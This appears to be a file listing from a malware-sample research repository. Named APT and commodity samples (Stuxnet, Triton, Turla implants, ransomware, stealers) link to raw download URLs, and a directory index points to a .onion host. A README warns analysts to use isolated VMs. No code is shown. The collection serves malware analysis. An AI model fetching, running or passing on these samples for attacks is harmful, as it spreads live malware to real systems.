19 | 20 | -------------------------------------------------------------------------------- /Stuxnet Malware/malware.ex_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Stuxnet Malware/malware.ex_ -------------------------------------------------------------------------------- /Stuxnet Malware/~WTR4132.tmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Stuxnet Malware/~WTR4132.tmp -------------------------------------------------------------------------------- /Stuxnet Malware/~WTR4141.tmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Stuxnet Malware/~WTR4141.tmp -------------------------------------------------------------------------------- /Triton/TRISIS-TRITON-HATMAN-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Triton/TRISIS-TRITON-HATMAN-master.zip -------------------------------------------------------------------------------- /Triton/TritonCRC.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Triton/TritonCRC.bin -------------------------------------------------------------------------------- /Trojans/FormbookStealer.false: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Trojans/FormbookStealer.false 
-------------------------------------------------------------------------------- /Trojans/GlLgNm3t.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Index of /Library/Trojans/Azorult 5 | 6 | 7 |

Index of /Library/Trojans/Azorult

8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 |
[ICO]NameLast modifiedSizeDescription

[PARENTDIR]Parent Directory  -  
[   ]AzorultDownloaderCVE-2017-11882.xml2018-10-16 22:36 9.3K 
[   ]AzorultPasswordStealer.bin2018-10-16 22:37 203K 

16 |
Apache/2.4.34 (Ubuntu) Server at iec56w4ibovnb4wc.onion Port 80
17 | 18 | -------------------------------------------------------------------------------- /Trojans/NanocoreRAT.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Trojans/NanocoreRAT.bin -------------------------------------------------------------------------------- /Trojans/PasswordStealer.NET.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Trojans/PasswordStealer.NET.bin -------------------------------------------------------------------------------- /Trojans/Razylokibot.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Trojans/Razylokibot.bin -------------------------------------------------------------------------------- /Trojans/Trickbotpwgrab.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Trojans/Trickbotpwgrab.bin -------------------------------------------------------------------------------- /Turla/CarbonImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/CarbonImplant.bin -------------------------------------------------------------------------------- /Turla/KazuarRAT.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/KazuarRAT.bin -------------------------------------------------------------------------------- /Turla/NCSC.bin: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/NCSC.bin -------------------------------------------------------------------------------- /Turla/Nautilus Implant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/Nautilus Implant.bin -------------------------------------------------------------------------------- /Turla/NeuronImplant2018.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/NeuronImplant2018.bin -------------------------------------------------------------------------------- /Turla/OutlookBackdoor.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/OutlookBackdoor.bin -------------------------------------------------------------------------------- /Turla/OutlookBackdoor2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/OutlookBackdoor2.bin -------------------------------------------------------------------------------- /Turla/TurlaAgent.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/TurlaAgent.exe -------------------------------------------------------------------------------- /Turla/TurlaDropper.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/TurlaDropper.bin -------------------------------------------------------------------------------- /Turla/TurlaKeylogger.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/TurlaKeylogger.bin -------------------------------------------------------------------------------- /Turla/TurlaSnakeImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Turla/TurlaSnakeImplant.bin -------------------------------------------------------------------------------- /UNC1945/info.txt: -------------------------------------------------------------------------------- 1 | File Naming Convention : CVE of sample utilization - Sample MD5 2 | -------------------------------------------------------------------------------- /UNC1945/【CVE-2019-0708】-6983f7001de10f4d19fc2d794c3eb534: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UNC1945/【CVE-2019-0708】-6983f7001de10f4d19fc2d794c3eb534 -------------------------------------------------------------------------------- /UPXsamples/MiraiELFBackdoorUPX.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/MiraiELFBackdoorUPX.bin -------------------------------------------------------------------------------- /UPXsamples/PackedRansomwareUPX.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/PackedRansomwareUPX.bin -------------------------------------------------------------------------------- /UPXsamples/ProcessHowllowingPacked.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/ProcessHowllowingPacked.bin -------------------------------------------------------------------------------- /UPXsamples/SaturnRansomewareUPX.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/SaturnRansomewareUPX.bin -------------------------------------------------------------------------------- /UPXsamples/ScarabRansomwareUPX.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/ScarabRansomwareUPX.exe -------------------------------------------------------------------------------- /UPXsamples/TrojanUPXPacked.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/TrojanUPXPacked.bin -------------------------------------------------------------------------------- /UPXsamples/Unlock26RansomewarePacked.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/Unlock26RansomewarePacked.bin -------------------------------------------------------------------------------- /UPXsamples/arsstealersafeloaderUPX.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/arsstealersafeloaderUPX.exe -------------------------------------------------------------------------------- /UPXsamples/yodascrypterUPX.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/UPXsamples/yodascrypterUPX.bin -------------------------------------------------------------------------------- /VoodooBearAPT/BlackEnergy.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/VoodooBearAPT/BlackEnergy.bin -------------------------------------------------------------------------------- /VoodooBearAPT/BlackEnergyImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/VoodooBearAPT/BlackEnergyImplant.bin -------------------------------------------------------------------------------- /WizardOpium/info.txt: -------------------------------------------------------------------------------- 1 | File Naming Convention : CVE of sample utilization - Sample MD5 2 | -------------------------------------------------------------------------------- /WizardOpium/【CVE-2019-13720】-efd360e7b2f576349a350d5fa5c75740 .bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/WizardOpium/【CVE-2019-13720】-efd360e7b2f576349a350d5fa5c75740 .bin -------------------------------------------------------------------------------- /__APTGroupInfoLinks.txt__: -------------------------------------------------------------------------------- 1 | 
https://www.fireeye.com/current-threats/apt-groups.html 2 | 3 | https://apt.securelist.com/#!/threats/ 4 | 5 | https://dragos.com/adversaries.html 6 | -------------------------------------------------------------------------------- /__DO NOT RUN SAMPLES ON YOUR HOST COMPUTER! USE A VIRTUAL MACHINE__.txt: -------------------------------------------------------------------------------- 1 | !!!DO NOT RUN SAMPLES ON YOUR OWN HOST/BOX. USE A VIRTUAL MACHINE!!! 2 | -------------------------------------------------------------------------------- /__README__.txt: -------------------------------------------------------------------------------- 1 | 0xffff0800 Malware Sample Library Dedicated Server 2 | 3 | ----------------------------------------------------- 4 | 5 | Welcome to my malware sample library server. 6 | I post all my favourite malware samples here for other security researchers/malware analysts to analyze and play with. 7 | 8 | **DO NOT RUN SAMPLES ON YOUR OWN BOX!!! USE A VIRTUAL MACHINE!** Keep that VM isolated from the host (no shared folders or clipboard, host-only or no networking) and revert it to a clean snapshot after each analysis. 9 | 10 | For more information on each of the samples, look it up on VirusTotal, Hybrid Analysis, and/or any other Threat Intelligence Platform. 11 | 12 | ----------------------------------------------------- 13 | http://twitter.com/0xffff0800 14 | 0xffff0800 Contact: 0xffff0800@protonmail.com 15 | 16 | --------------------------------------------------------------------------------